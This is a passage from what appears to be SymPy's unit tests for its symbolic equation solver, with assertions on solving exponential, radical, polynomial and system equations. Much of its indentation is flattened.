assert set(solve(Poly(sqrt(exp(x)) + sqrt(exp(-x)) - 4))) in \
[
set([2*log(-sqrt(3) + 2), 2*log(sqrt(3) + 2)]),
set([log(-4*sqrt(3) + 7), log(4*sqrt(3) + 7)]),
]
assert set(solve(Poly(exp(x) + exp(-x) - 4))) == \
set([log(-sqrt(3) + 2), log(sqrt(3) + 2)])
assert set(solve(x**y + x**(2*y) - 1, x)) == \
set([(-S.Half + sqrt(5)/2)**(1/y), (-S.Half - sqrt(5)/2)**(1/y)])
assert solve(exp(x/y)*exp(-z/y) - 2, y) == [(x - z)/log(2)]
assert solve(
x**z*y**z - 2, z) in [[log(2)/(log(x) + log(y))], [log(2)/(log(x*y))]]
    # if inversion is done too soon then multiple roots, as in the following,
    # will be missed, e.g. if exp(3*x) = exp(3) were reduced to 3*x = 3
E = S.Exp1
assert set(solve(exp(3*x) - exp(3), x)) in [
set([S(1), log(-E/2 - sqrt(3)*E*I/2), log(-E/2 + sqrt(3)*E*I/2)]),
set([S(1), log(E*(-S(1)/2 - sqrt(3)*I/2)), log(E*(-S(1)/2 + sqrt(3)*I/2))]),
]
# coverage test
p = Symbol('p', positive=True)
assert solve((1/p + 1)**(p + 1)) == []
def test_issue_2098():
x = Symbol('x', real=True)
assert solve(x**2 + 1, x) == []
n = Symbol('n', integer=True, positive=True)
assert solve((n - 1)*(n + 2)*(2*n - 1), n) == [1]
x = Symbol('x', positive=True)
y = Symbol('y')
assert solve([x + 5*y - 2, -3*x + 6*y - 15], x, y) == []
# not {x: -3, y: 1} b/c x is positive
    # The following solution should not contain (-sqrt(2), sqrt(2))
assert solve((x + y)*n - y**2 + 2, x, y) == [(sqrt(2), -sqrt(2))]
y = Symbol('y', positive=True)
    # The following solution should not contain {y: -x*exp(x/2)}
assert solve(x**2 - y**2/exp(x), y, x) == [{y: x*exp(x/2)}]
assert solve(x**2 - y**2/exp(x), x, y) == [{x: 2*LambertW(y/2)}]
x, y, z = symbols('x y z', positive=True)
assert solve(z**2*x**2 - z**2*y**2/exp(x), y, x, z) == [{y: x*exp(x/2)}]
def test_checking():
assert set(
solve(x*(x - y/x), x, check=False)) == set([sqrt(y), S(0), -sqrt(y)])
assert set(solve(x*(x - y/x), x, check=True)) == set([sqrt(y), -sqrt(y)])
    # {x: 0, y: 4} sets a denominator to 0 in the following, so the system should return no solutions
assert solve((1/(1/x + 2), 1/(y - 3) - 1)) == []
    # x = 0 sets the denominator of 1/x to zero, so no solution is returned
assert solve(1/(1/x + 2)) == []
def test_issue_1572_1364_1368():
assert solve((sqrt(x**2 - 1) - 2)) in ([sqrt(5), -sqrt(5)],
[-sqrt(5), sqrt(5)])
assert set(solve((2**exp(y**2/x) + 2)/(x**2 + 15), y)) == set([
-sqrt(x)*sqrt(-log(log(2)) + log(log(2) + I*pi)),
sqrt(x)*sqrt(-log(log(2)) + log(log(2) + I*pi))])
C1, C2 = symbols('C1 C2')
f = Function('f')
assert solve(C1 + C2/x**2 - exp(-f(x)), f(x)) == [log(x**2/(C1*x**2 + C2))]
a = Symbol('a')
E = S.Exp1
assert solve(1 - log(a + 4*x**2), x) in (
[-sqrt(-a + E)/2, sqrt(-a + E)/2],
[sqrt(-a + E)/2, -sqrt(-a + E)/2]
)
assert solve(log(a**(-3) - x**2)/a, x) in (
[-sqrt(-1 + a**(-3)), sqrt(-1 + a**(-3))],
[sqrt(-1 + a**(-3)), -sqrt(-1 + a**(-3))],)
assert solve(1 - log(a + 4*x**2), x) in (
[-sqrt(-a + E)/2, sqrt(-a + E)/2],
[sqrt(-a + E)/2, -sqrt(-a + E)/2],)
assert set(solve((
a**2 + 1) * (sin(a*x) + cos(a*x)), x)) == set([-pi/(4*a), 3*pi/(4*a)])
assert solve(3 - (sinh(a*x) + cosh(a*x)), x) == [log(3)/a]
assert set(solve(3 - (sinh(a*x) + cosh(a*x)**2), x)) == \
set([log(-2 + sqrt(5))/a, log(-sqrt(2) + 1)/a,
log(-sqrt(5) - 2)/a, log(1 + sqrt(2))/a])
assert solve(atan(x) - 1) == [tan(1)]
def test_issue_2033():
r, t = symbols('r,t')
assert set(solve([r - x**2 - y**2, tan(t) - y/x], [x, y])) == \
set([
(-sqrt(r*tan(t)**2/(tan(t)**2 + 1))/tan(t),
-sqrt(r*tan(t)**2/(tan(t)**2 + 1))),
(sqrt(r*tan(t)**2/(tan(t)**2 + 1))/tan(t),
sqrt(r*tan(t)**2/(tan(t)**2 + 1)))])
assert solve([exp(x) - sin(y), 1/y - 3], [x, y]) == \
[(log(sin(S(1)/3)), S(1)/3)]
assert solve([exp(x) - sin(y), 1/exp(y) - 3], [x, y]) == \
[(log(-sin(log(3))), -log(3))]
assert set(solve([exp(x) - sin(y), y**2 - 4], [x, y])) == \
set([(log(-sin(2)), -S(2)), (log(sin(2)), S(2))])
eqs = [exp(x)**2 - sin(y) + z**2, 1/exp(y) - 3]
assert solve(eqs, set=True) == \
([x, y], set([
(log(-sqrt(-z**2 - sin(log(3)))), -log(3)),
(log(sqrt(-z**2 - sin(log(3)))), -log(3))]))
assert solve(eqs, x, z, set=True) == \
([x], set([
(log(-sqrt(-z**2 + sin(y))),),
(log(sqrt(-z**2 + sin(y))),)]))
assert set(solve(eqs, x, y)) == \
set([
(log(-sqrt(-z**2 - sin(log(3)))), -log(3)),
(log(sqrt(-z**2 - sin(log(3)))), -log(3))])
assert set(solve(eqs, y, z)) == \
set([
(-log(3), -sqrt(-exp(2*x) - sin(log(3)))),
(-log(3), sqrt(-exp(2*x) - sin(log(3))))])
eqs = [exp(x)**2 - sin(y) + z, 1/exp(y) - 3]
assert solve(eqs, set=True) == ([x, y], set(
[
(log(-sqrt(-z - sin(log(3)))), -log(3)),
(log(sqrt(-z - sin(log(3)))), -log(3))]))
assert solve(eqs, x, z, set=True) == ([x], set(
[
(log(-sqrt(-z + sin(y))),),
(log(sqrt(-z + sin(y))),)]))
assert set(solve(eqs, x, y)) == set(
[
(log(-sqrt(-z - sin(log(3)))), -log(3)),
(log(sqrt(-z - sin(log(3)))), -log(3))])
assert solve(eqs, z, y) == \
[(-exp(2*x) - sin(log(3)), -log(3))]
assert solve((sqrt(x**2 + y**2) - sqrt(10), x + y - 4), set=True) == (
[x, y], set([(S(1), S(3)), (S(3), S(1))]))
assert set(solve((sqrt(x**2 + y**2) - sqrt(10), x + y - 4), x, y)) == \
set([(S(1), S(3)), (S(3), S(1))])
def test_issue_2236():
lam, a0, conc = symbols('lam a0 conc')
eqs = [lam + 2*y - a0*(1 - x/2)*x - 0.005*x/2*x,
a0*(1 - x/2)*x - 1*y - 0.743436700916726*y,
x + y - conc]
sym = [x, y, a0]
# there are 4 solutions but only two are valid
assert len(solve(eqs, sym, manual=True, minimal=True, simplify=False)) == 2
def test_issue_2236_float():
skip("This test hangs.")
lam, a0, conc = symbols('lam a0 conc')
eqs = [lam + 2*y - a0*(1 - x/2)*x - 0.005*x/2*x,
a0*(1 - x/2)*x - 1*y - 0.743436700916726*y,
x + y - conc]
sym = [x, y, a0]
assert len(
solve(eqs, sym, rational=False, check=False, simplify=False)) == 2
def test_issue_2668():
assert set(solve([x**2 + y + 4], [x])) == \
set([(-sqrt(-y - 4),), (sqrt(-y - 4),)])
def test_polysys():
assert set(solve([x**2 + 2/y - 2, x + y - 3], [x, y])) == \
set([(S(1), S(2)), (1 + sqrt(5), 2 - sqrt(5)),
(1 - sqrt(5), 2 + sqrt(5))])
assert solve([x**2 + y - 2, x**2 + y]) == []
# the ordering should be whatever the user requested
assert solve([x**2 + y - 3, x - y - 4], (x, y)) != solve([x**2 +
y - 3, x - y - 4], (y, x))
def test_unrad():
s = symbols('s', cls=Dummy)
    # checkers to deal with the possibility of the answer coming
    # back with a sign change (cf issue 2104)
def check(rv, ans):
rv, ans = list(rv), list(ans)
rv[0] = rv[0].expand()
ans[0] = ans[0].expand()
return rv[0] in [ans[0], -ans[0]] and rv[1:] == ans[1:]
def s_check(rv, ans):
# get the dummy
rv = list(rv)
d = rv[0].atoms(Dummy)
reps = list(zip(d, [s]*len(d)))
# replace s with this dummy
rv = (rv[0].subs(reps).expand(), [(p[0].subs(reps), p[1].subs(reps))
for p in rv[1]],
[a.subs(reps) for a in rv[2]])
ans = (ans[0].subs(reps).expand(), [(p[0].subs(reps), p[1].subs(reps))
for p in ans[1]],
[a.subs(reps) for a in ans[2]])
return str(rv[0]) in [str(ans[0]), str(-ans[0])] and \
str(rv[1:]) == str(ans[1:])
assert check(unrad(sqrt(x)),
(x, [], []))
assert check(unrad(sqrt(x) + 1),
(x - 1, [], []))
assert s_check(unrad(sqrt(x) + x**Rational(1, 3) + 2),
(2 + s**2 + s**3, [(s, x - s**6)], []))
assert check(unrad(sqrt(x)*x**Rational(1, 3) + 2),
(x**5 - 64, [], []))
assert check(unrad(sqrt(x) + (x + 1)**Rational(1, 3)),
(x**3 - (x + 1)**2, [], []))
assert check(unrad(sqrt(x) + sqrt(x + 1) + sqrt(2*x)),
(-2*sqrt(2)*x - 2*x + 1, [], []))
assert check(unrad(sqrt(x) + sqrt(x + 1) + 2),
(16*x - 9, [], []))
assert check(unrad(sqrt(x) + sqrt(x + 1) + sqrt(1 - x)),
(-4*x + 5*x**2, [], []))
assert check(unrad(a*sqrt(x) + b*sqrt(x) + c*sqrt(y) + d*sqrt(y)),
((a*sqrt(x) + b*sqrt(x))**2 - (c*sqrt(y) + d*sqrt(y))**2, [], []))
assert check(unrad(sqrt(x) + sqrt(1 - x)),
(2*x - 1, [], []))
assert check(unrad(sqrt(x) + sqrt(1 - x) - 3),
(9*x + (x - 5)**2 - 9, [], []))
assert check(unrad(sqrt(x) + sqrt(1 - x) + sqrt(2 + x)),
(-5*x**2 + 2*x - 1, [], []))
assert check(unrad(sqrt(x) + sqrt(1 - x) + sqrt(2 + x) - 3),
(-25*x**4 - 376*x**3 - 1256*x**2 + 2272*x - 784, [], []))
assert check(unrad(sqrt(x) + sqrt(1 - x) + sqrt(2 + x) - sqrt(1 - 2*x)),
(-41*x**4 - 40*x**3 - 232*x**2 + 160*x - 16, [], []))
assert check(unrad(sqrt(x) + sqrt(x + 1)), (S(1), [], []))
eq = sqrt(x) + sqrt(x + 1) + sqrt(1 - sqrt(x))
assert check(unrad(eq),
(16*x**3 - 9*x**2, [], []))
assert set(solve(eq, check=False)) == set([S(0), S(9)/16])
assert solve(eq) == []
# but this one really does have those solutions
assert set(solve(sqrt(x) - sqrt(x + 1) + sqrt(1 - sqrt(x)))) == \
set([S.Zero, S(9)/16])
'''NOTE
real_root changes the value of the result if the solution is
simplified; `a` in the text below is the root that is not 4/5:
>>> eq
sqrt(x) + sqrt(-x + 1) + sqrt(x + 1) - 6*sqrt(5)/5
>>> eq.subs(x, a).n()
-0.e-123 + 0.e-127*I
>>> real_root(eq.subs(x, a)).n()
-0.e-123 + 0.e-127*I
>>> (eq.subs(x,simplify(a))).n()
-0.e-126
>>> real_root(eq.subs(x, simplify(a))).n()
0.194825975605452 + 2.15093623885838*I
>>> sqrt(x).subs(x, real_root(a)).n()
0.809823827278194 - 0.e-25*I
>>> sqrt(x).subs(x, (a)).n()
0.809823827278194 - 0.e-25*I
>>> sqrt(x).subs(x, simplify(a)).n()
0.809823827278194 - 5.32999467690853e-25*I
>>> sqrt(x).subs(x, real_root(simplify(a))).n()
0.49864610868139 + 1.44572604257047*I
'''
eq = (sqrt(x) + sqrt(x + 1) + sqrt(1 - x) - 6*sqrt(5)/5)
ra = S('''-1484/375 - 4*(-1/2 + sqrt(3)*I/2)*(-12459439/52734375 +
114*sqrt(12657)/78125)**(1/3) - 172564/(140625*(-1/2 +
sqrt(3)*I/2)*(-12459439/52734375 + 114*sqrt(12657)/78125)**(1/3))''')
rb = S(4)/5
ans = solve(sqrt(x) + sqrt(x + 1) + sqrt(1 - x) - 6*sqrt(5)/5)
assert all(abs(eq.subs(x, i).n()) < 1e-10 for i in (ra, rb)) and \
len(ans) == 2 and \
set([i.n(chop=True) for i in ans]) == \
set([i.n(chop=True) for i in (ra, rb)])
raises(ValueError, lambda:
unrad(-root(x,3)**2 + 2**pi*root(x,3) - x + 2**pi))
raises(ValueError, lambda:
unrad(sqrt(x) + sqrt(x + 1) + sqrt(1 - sqrt(x)) + 3))
raises(ValueError, lambda:
unrad(sqrt(x) + (x + 1)**Rational(1, 3) + 2*sqrt(y)))
# same as last but consider only y
assert check(unrad(sqrt(x) + (x + 1)**Rational(1, 3) + 2*sqrt(y), y),
(4*y - (sqrt(x) + (x + 1)**(S(1)/3))**2, [], []))
assert check(unrad(sqrt(x/(1 - x)) + (x + 1)**Rational(1, 3)),
(x**3/(-x + 1)**3 - (x + 1)**2, [], [(-x + 1)**3]))
# same as last but consider only y; no y-containing denominators now
assert s_check(unrad(sqrt(x/(1 - x)) + 2*sqrt(y), y),
(x/(-x + 1) - 4*y, [], []))
assert check(unrad(sqrt(x)*sqrt(1 - x) + 2, x),
(x*(-x + 1) - 4, [], []))
# http://tutorial.math.lamar.edu/
# Classes/Alg/SolveRadicalEqns.aspx#Solve_Rad_Ex2_a
assert solve(Eq(x, sqrt(x + 6))) == [3]
assert solve(Eq(x + sqrt(x - 4), 4)) == [4]
assert solve(Eq(1, x + sqrt(2*x - 3))) == []
assert set(solve(Eq(sqrt(5*x + 6) - 2, x))) == set([-S(1), S(2)])
assert set(solve(Eq(sqrt(2*x - 1) - sqrt(x - 4), 2))) == set([S(5), S(13)])
assert solve(Eq(sqrt(x + 7) + 2, sqrt(3 - x))) == [-6]
# http://www.purplemath.com/modules/solverad.htm
assert solve((2*x - 5)**Rational(1, 3) - 3) == [16]
assert solve((x**3 - 3*x**2)**Rational(1, 3) + 1 - x) == []
assert set(solve(x + 1 - (x**4 + 4*x**3 - x)**Rational(1, 4))) == \
set([-S(1)/2, -S(1)/3])
assert set(solve(sqrt(2*x**2 - 7) - (3 - x))) == set([-S(8), S(2)])
assert solve(sqrt(2*x + 9) - sqrt(x + 1) - sqrt(x + 4)) == [0]
assert solve(sqrt(x + 4) + sqrt(2*x - 1) - 3*sqrt(x - 1)) == [5]
assert solve(sqrt(x)*sqrt(x - 7) - 12) == [16]
assert solve(sqrt(x - 3) + sqrt(x) - 3) == [4]
assert solve(sqrt(9*x**2 + 4) - (3*x + 2)) == [0]
assert solve(sqrt(x) - 2 - 5) == [49]
assert solve(sqrt(x - 3) - sqrt(x) - 3) == []
assert solve(sqrt(x - 1) - x + 7) == [10]
assert solve(sqrt(x - 2) - 5) == [27]
assert solve(sqrt(17*x - sqrt(x**2 - 5)) - 7) == [3]
assert solve(sqrt(x) - sqrt(x - 1) + sqrt(sqrt(x))) == []
# don't posify the expression in unrad and use _mexpand
z = sqrt(2*x + 1)/sqrt(x) - sqrt(2 + 1/x)
p = posify(z)[0]
assert solve(p) == []
assert solve(z) == []
assert solve(z + 6*I) == [-S(1)/11]
assert solve(p + 6*I) == []
eq = sqrt(2 + I) + 2*I
assert unrad(eq - x, x, all=True) == (x**4 + 4*x**2 + 8*x + 37, [], [])
ans = (81*x**8 - 2268*x**6 - 4536*x**5 + 22644*x**4 + 63216*x**3 -
31608*x**2 - 189648*x + 141358, [], [])
r = sqrt(sqrt(2)/3 + 7)
eq = sqrt(r) + r - x
assert unrad(eq, all=1)
r2 = sqrt(sqrt(2) + 21)/sqrt(3)
assert r != r2 and r.equals(r2)
assert unrad(eq - r + r2, all=True) == ans
@slow
def test_unrad_slow():
ans = solve(sqrt(x) + sqrt(x + 1) -
sqrt(1 - x) - sqrt(2 + x))
assert len(ans) == 1 and NS(ans[0])[:4] == '0.73'
# the fence optimization problem
# http://code.google.com/p/sympy/issues/detail?id=1694#c159
F = Symbol('F')
eq = F - (2*x + 2*y + sqrt(x**2 + y**2))
X = solve(eq, x, hint='minimal')[0]
Y = solve((x*y).subs(x, X).diff(y), y, simplify=False, minimal=True)
ans = 2*F/7 - sqrt(2)*F/14
assert any((a - ans).expand().is_zero for a in Y)
eq = S('''
-x + (1/2 - sqrt(3)*I/2)*(3*x**3/2 - x*(3*x**2 - 34)/2 + sqrt((-3*x**3
+ x*(3*x**2 - 34) + 90)**2/4 - 39304/27) - 45)**(1/3) + 34/(3*(1/2 -
sqrt(3)*I/2)*(3*x**3/2 - x*(3*x**2 - 34)/2 + sqrt((-3*x**3 + x*(3*x**2
- 34) + 90)**2/4 - 39304/27) - 45)**(1/3))''')
raises(NotImplementedError, lambda: solve(eq)) # not other code errors
def test__invert():
assert _invert(x - 2) == (2, x)
assert _invert(2) == (2, 0)
assert _invert(exp(1/x) - 3, x) == (1/log(3), x)
assert _invert(exp(1/x + a/x) - 3, x) == ((a + 1)/log(3), x)
assert _invert(a, x) == (a, 0)
def test_issue_1364():
assert solve(-a*x + 2*x*log(x), x) == [exp(a/2)]
assert solve(a/x + exp(x/2), x) == [2*LambertW(-a/2)]
assert solve(x**x) == []
assert solve(x**x - 2) == [exp(LambertW(log(2)))]
assert solve(((x - 3)*(x - 2))**((x - 3)*(x - 4))) == [2]
assert solve(
(a/x + exp(x/2)).diff(x), x) == [4*LambertW(sqrt(2)*sqrt(a)/4)]
def test_issue_2015():
a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r = symbols('a:r')
# there is no 'a' in the equation set but this is how the
# problem was originally posed
syms = a, b, c, f, h, k, n
eqs = [b + r/d - c/d,
c*(1/d + 1/e + 1/g) - f/g - r/d,
f*(1/g + 1/i + 1/j) - c/g - h/i,
h*(1/i + 1/l + 1/m) - f/i - k/m,
k*(1/m + 1/o + 1/p) - h/m - n/p,
n*(1/p + 1/q) - k/p]
assert len(solve(eqs, syms, manual=True, check=False, simplify=False)) == 1
def test_misc():
    # make sure that the right variable is picked up in tsolve
raises(NotImplementedError, lambda: solve((exp(x) + 1)**x))
def test_issue_2750():
I1, I2, I3, I4, I5, I6 = symbols('I1:7')
dI1, dI4, dQ2, dQ4, Q2, Q4 = symbols('dI1,dI4,dQ2,dQ4,Q2,Q4')
e = (
I1 - I2 - I3,
I3 - I4 - I5,
I4 + I5 - I6,
-I1 + I2 + I6,
-2*I1 - 2*I3 - 2*I5 - 3*I6 - dI1/2 + 12,
-I4 + dQ4,
-I2 + dQ2,
2*I3 + 2*I5 + 3*I6 - Q2,
I4 - 2*I5 + 2*Q4 + dI4
)
ans = [{
dQ4: I3 - I5,
dI1: -4*I2 - 8*I3 - 4*I5 - 6*I6 + 24,
I4: I3 - I5,
dQ2: I2,
Q2: 2*I3 + 2*I5 + 3*I6,
I1: I2 + I3,
Q4: -I3/2 + 3*I5/2 - dI4/2}]
assert solve(e, I1, I4, Q2, Q4, dI1, dI4, dQ2, dQ4, manual=True) == ans
# the matrix solver (tested below) doesn't like this because it produces
# a zero row in the matrix. Is this related to issue 1452?
assert [ei.subs(
ans[0]) for ei in e] == [0, 0, I3 - I6, -I3 + I6, 0, 0, 0, 0, 0]
def test_2750_matrix():
    '''Same as test_issue_2750 but solved with the matrix solver.'''
I1, I2, I3, I4, I5, I6 = symbols('I1:7')
dI1, dI4, dQ2, dQ4, Q2, Q4 = symbols('dI1,dI4,dQ2,dQ4,Q2,Q4')
e = (
I1 - I2 - I3,
I3 - I4 - I5,
I4 + I5 - I6,
-I1 + I2 + I6,
-2*I1 - 2*I3 - 2*I5 - 3*I6 - dI1/2 + 12,
-I4 + dQ4,
-I2 + dQ2,
2*I3 + 2*I5 + 3*I6 - Q2,
I4 - 2*I5 + 2*Q4 + dI4
)
assert solve(e, I1, I4, Q2, Q4, dI1, dI4, dQ2, dQ4) == {
dI4: -I3 + 3*I5 - 2*Q4,
dI1: -4*I2 - 8*I3 - 4*I5 - 6*I6 + 24,
dQ2: I2,
I1: I2 + I3,
Q2: 2*I3 + 2*I5 + 3*I6,
dQ4: I3 - I5,
I4: I3 - I5}
def test_issue_2802():
f, g, h = map(Function, 'fgh')
a = Symbol('a')
D = Derivative(f(x), x)
G = Derivative(g(a), a)
assert solve(f(x) + f(x).diff(x), f(x)) == \
[-D]
assert solve(f(x) - 3, f(x)) == \
[3]
assert solve(f(x) - 3*f(x).diff(x), f(x)) == \
[3*D]
assert solve([f(x) - 3*f(x).diff(x)], f(x)) == \
{f(x): 3*D}
assert solve([f(x) - 3*f(x).diff(x), f(x)**2 - y + 4], f(x), y) == \
[{f(x): 3*D, y: 9*D**2 + 4}]
assert solve(-f(a)**2*g(a)**2 + f(a)**2*h(a)**2 + g(a).diff(a),
h(a), g(a), set=True) == \
([g(a)], set([
(-sqrt(h(a)**2 + G/f(a)**2),),
(sqrt(h(a)**2 + G/f(a)**2),)]))
args = [f(x).diff(x, 2)*(f(x) + g(x)) - g(x)**2 + 2, f(x), g(x)]
assert set(solve(*args)) == \
set([(-sqrt(2), sqrt(2)), (sqrt(2), -sqrt(2))])
eqs = [f(x)**2 + g(x) - 2*f(x).diff(x), g(x)**2 - 4]
assert solve(eqs, f(x), g(x), set=True) == \
([f(x), g(x)], set([
(-sqrt(2*D - 2), S(2)),
(sqrt(2*D - 2), S(2)),
(-sqrt(2*D + 2), -S(2)),
(sqrt(2*D + 2), -S(2))]))
    # the underlying problem was in solve_linear, which was not masking off
    # anything but a Mul or Add; it now raises an error if it gets anything
    # but a symbol, and solve handles the necessary substitutions so
    # solve_linear won't make this error
raises(
ValueError, lambda: solve_linear(f(x) + f(x).diff(x), symbols=[f(x)]))
assert solve_linear(f(x) + f(x).diff(x), symbols=[x]) == \
(f(x) + Derivative(f(x), x), 1)
assert solve_linear(f(x) + Integral(x, (x, y)), symbols=[x]) == \
(f(x) + Integral(x, (x, y)), 1)
assert solve_linear(f(x) + Integral(x, (x, y)) + x, symbols=[x]) == \
(x + f(x) + Integral(x, (x, y)), 1)
assert solve_linear(f(y) + Integral(x, (x, y)) + x, symbols=[x]) == \
(x, -f(y) - Integral(x, (x, y)))
assert solve_linear(x - f(x)/a + (f(x) - 1)/a, symbols=[x]) == \
(x, 1/a)
assert solve_linear(x + Derivative(2*x, x)) == \
(x, -2)
assert solve_linear(x + Integral(x, y), symbols=[x]) == \
(x, 0)
assert solve_linear(x + Integral(x, y) - 2, symbols=[x]) == \
(x, 2/(y + 1))
assert set(solve(x + exp(x)**2, exp(x))) == \
set([-sqrt(-x), sqrt(-x)])
assert solve(x + exp(x), x, implicit=True) == \
[-exp(x)]
assert solve(cos(x) - sin(x), x, implicit=True) == []
assert solve(x - sin(x), x, implicit=True) == \
[sin(x)]
assert solve(x**2 + x - 3, x, implicit=True) == \
[-x**2 + 3]
assert solve(x**2 + x - 3, x**2, implicit=True) == \
[-x + 3]
def test_issue_2813():
assert set(solve(x**2 - x - 0.1, rational=True)) == \
set([S(1)/2 + sqrt(35)/10, -sqrt(35)/10 + S(1)/2])
# [-0.0916079783099616, 1.09160797830996]
ans = solve(x**2 - x - 0.1, rational=False)
assert len(ans) == 2 and all(a.is_Number for a in ans)
ans = solve(x**2 - x - 0.1)
assert len(ans) == 2 and all(a.is_Number for a in ans)
def test_float_handling():
def test(e1, e2):
return len(e1.atoms(Float)) == len(e2.atoms(Float))
assert solve(x - 0.5, rational=True)[0].is_Rational
assert solve(x - 0.5, rational=False)[0].is_Float
assert solve(x - S.Half, rational=False)[0].is_Rational
assert solve(x - 0.5, rational=None)[0].is_Float
assert solve(x - S.Half, rational=None)[0].is_Rational
assert test(nfloat(1 + 2*x), 1.0 + 2.0*x)
for contain in [list, tuple, set]:
ans = nfloat(contain([1 + 2*x]))
assert type(ans) is contain and test(list(ans)[0], 1.0 + 2.0*x)
k, v = list(nfloat({2*x: [1 + 2*x]}).items())[0]
assert test(k, 2*x) and test(v[0], 1.0 + 2.0*x)
assert test(nfloat(cos(2*x)), cos(2.0*x))
assert test(nfloat(3*x**2), 3.0*x**2)
assert test(nfloat(3*x**2, exponent=True), 3.0*x**2.0)
assert test(nfloat(exp(2*x)), exp(2.0*x))
assert test(nfloat(x/3), x/3.0)
assert test(nfloat(x**4 + 2*x + cos(S(1)/3) + 1),
x**4 + 2.0*x + 1.94495694631474)
# don't call nfloat if there is no solution
tot = 100 + c + z + t
assert solve(((.7 + c)/tot - .6, (.2 + z)/tot - .3, t/tot - .1)) == []
def test_check_assumptions():
x = symbols('x', positive=True)
assert solve(x**2 - 1) == [1]
def test_solve_abs():
assert set(solve(abs(x - 7) - 8)) == set([-S(1), S(15)])
r = symbols('r', real=True)
raises(NotImplementedError, lambda: solve(2*abs(r) - abs(r - 1)))
def test_issue_2957():
assert solve(tanh(x + 3)*tanh(x - 3) - 1) == []
assert set([simplify(w) for w in solve(tanh(x - 1)*tanh(x + 1) + 1)]) == set([
-log(2)/2 + log(1 - I),
-log(2)/2 + log(-1 - I),
-log(2)/2 + log(1 + I),
-log(2)/2 + log(-1 + I),])
assert set([simplify(w) for w in solve((tanh(x + 3)*tanh(x - 3) + 1)**2)]) == set([
-log(2)/2 + log(1 - I),
-log(2)/2 + log(-1 - I),
-log(2)/2 + log(1 + I),
-log(2)/2 + log(-1 + I),])
def test_issue_2961():
x = Symbol('x')
absxm3 = Piecewise(
(x - 3, S(0) <= x - 3),
(3 - x, S(0) > x - 3)
)
y = Symbol('y')
assert solve(absxm3 - y, x) == [
Piecewise((-y + 3, S(0) > -y), (S.NaN, True)),
Piecewise((y + 3, S(0) <= y), (S.NaN, True))
]
y = Symbol('y', positive=True)
assert solve(absxm3 - y, x) == [-y + 3, y + 3]
def test_issue_2574():
eq = -x + exp(exp(LambertW(log(x)))*LambertW(log(x)))
assert checksol(eq, x, 2) is True
assert checksol(eq, x, 2, numerical=False) is None
def test_exclude():
R, C, Ri, Vout, V1, Vminus, Vplus, s = \
symbols('R, C, Ri, Vout, V1, Vminus, Vplus, s')
Rf = symbols('Rf', positive=True) # to eliminate Rf = 0 soln
eqs = [C*V1*s + Vplus*(-2*C*s - 1/R),
Vminus*(-1/Ri - 1/Rf) + Vout/Rf,
C*Vplus*s + V1*(-C*s - 1/R) + Vout/R,
-Vminus + Vplus]
assert solve(eqs, exclude=s*C*R) == [
{
Rf: Ri*(C*R*s + 1)**2/(C*R*s),
Vminus: Vplus,
V1: Vplus*(2*C*R*s + 1)/(C*R*s),
Vout: Vplus*(C**2*R**2*s**2 + 3*C*R*s + 1)/(C*R*s)},
{
Vplus: 0,
Vminus: 0,
V1: 0,
Vout: 0},
]
# TODO: Investigate why solution [0] is currently preferred over [1].
assert solve(eqs, exclude=[Vplus, s, C]) in [[{
Vminus: Vplus,
V1: Vout/2 + Vplus/2 + sqrt((Vout - 5*Vplus)*(Vout - Vplus))/2,
R: (Vout - 3*Vplus - sqrt(Vout**2 - 6*Vout*Vplus + 5*Vplus**2))/(2*C*Vplus*s),
Rf: Ri*(Vout - Vplus)/Vplus,
}, {
Vminus: Vplus,
V1: Vout/2 + Vplus/2 - sqrt((Vout - 5*Vplus)*(Vout - Vplus))/2,
R: (Vout - 3*Vplus + sqrt(Vout**2 - 6*Vout*Vplus + 5*Vplus**2))/(2*C*Vplus*s),
Rf: Ri*(Vout - Vplus)/Vplus,
}], [{
Vminus: Vplus,
Vout: (V1**2 - V1*Vplus - Vplus**2)/(V1 - 2*Vplus),
Rf: Ri*(V1 - Vplus)**2/(Vplus*(V1 - 2*Vplus)),
R: Vplus/(C*s*(V1 - 2*Vplus)),
}]]
def test_high_order_roots():
s = x**5 + 4*x**3 + 3*x**2 + S(7)/4
assert set(solve(s)) == set(Poly(s*4, domain='ZZ').all_roots())
def test_minsolve_linear_system():
def count(dic):
return len([x for x in dic.values() if x == 0])
assert count(solve([x + y + z, y + z + a + t], particular=True, quick=True)) \
== 3
assert count(solve([x + y + z, y + z + a + t], particular=True, quick=False)) \
== 3
assert count(solve([x + y + z, y + z + a], particular=True, quick=True)) == 1
assert count(solve([x + y + z, y + z + a], particular=True, quick=False)) == 2
def test_real_roots():
# cf. issue 3551
x = Symbol('x', real=True)
assert len(solve(x**5 + x**3 + 1)) == 1
@slow
def test_issue3429():
eqs = [
327600995*x**2 - 37869137*x + 1809975124*y**2 - 9998905626,
895613949*x**2 - 273830224*x*y + 530506983*y**2 - 10000000000]
assert len(solve(eqs, y, x)) == len(solve(eqs, y, x, manual=True)) == 4
def test_overdetermined():
eqs = [Abs(4*x - 7) - 5, Abs(3 - 8*x) - 1]
assert solve(eqs, x) == [(S.Half,)]
assert solve(eqs, x, manual=True) == [(S.Half,)]
assert solve(eqs, x, manual=True, check=False) == [(S.Half/2,), (S.Half,)]
def test_issue_3506():
x = symbols('x')
assert solve(4**(x/2) - 2**(x/3)) == [0]
# while the first one passed, this one failed
x = symbols('x', real=True)
assert solve(5**(x/2) - 2**(x/3)) == [0]
b = sqrt(6)*sqrt(log(2))/sqrt(log(5))
assert solve(5**(x/2) - 2**(3/x)) == [-b, b]
def test__ispow():
assert _ispow(x**2)
assert not _ispow(x)
assert not _ispow(True)
def test_issue_3545():
eq = -sqrt((m - q)**2 + (-m/(2*q) + S(1)/2)**2) + sqrt((-m**2/2 - sqrt(
4*m**4 - 4*m**2 + 8*m + 1)/4 - S(1)/4)**2 + (m**2/2 - m - sqrt(
4*m**4 - 4*m**2 + 8*m + 1)/4 - S(1)/4)**2)
assert solve(eq, q) == [
m**2/2 - sqrt(4*m**4 - 4*m**2 + 8*m + 1)/4 - S(1)/4,
m**2/2 + sqrt(4*m**4 - 4*m**2 + 8*m + 1)/4 - S(1)/4]
def test_issue_3653():
assert solve([a**2 + a, a - b], [a, b]) == [(-1, -1), (0, 0)]
assert solve([a**2 + a*c, a - b], [a, b]) == [(0, 0), (-c, -c)]
def test_issue_3693():
assert solve(x*(x - 1)**2*(x + 1)*(x**6 - x + 1)) == [
-1, 0, 1, RootOf(x**6 - x + 1, 0), RootOf(x**6 - x + 1, 1),
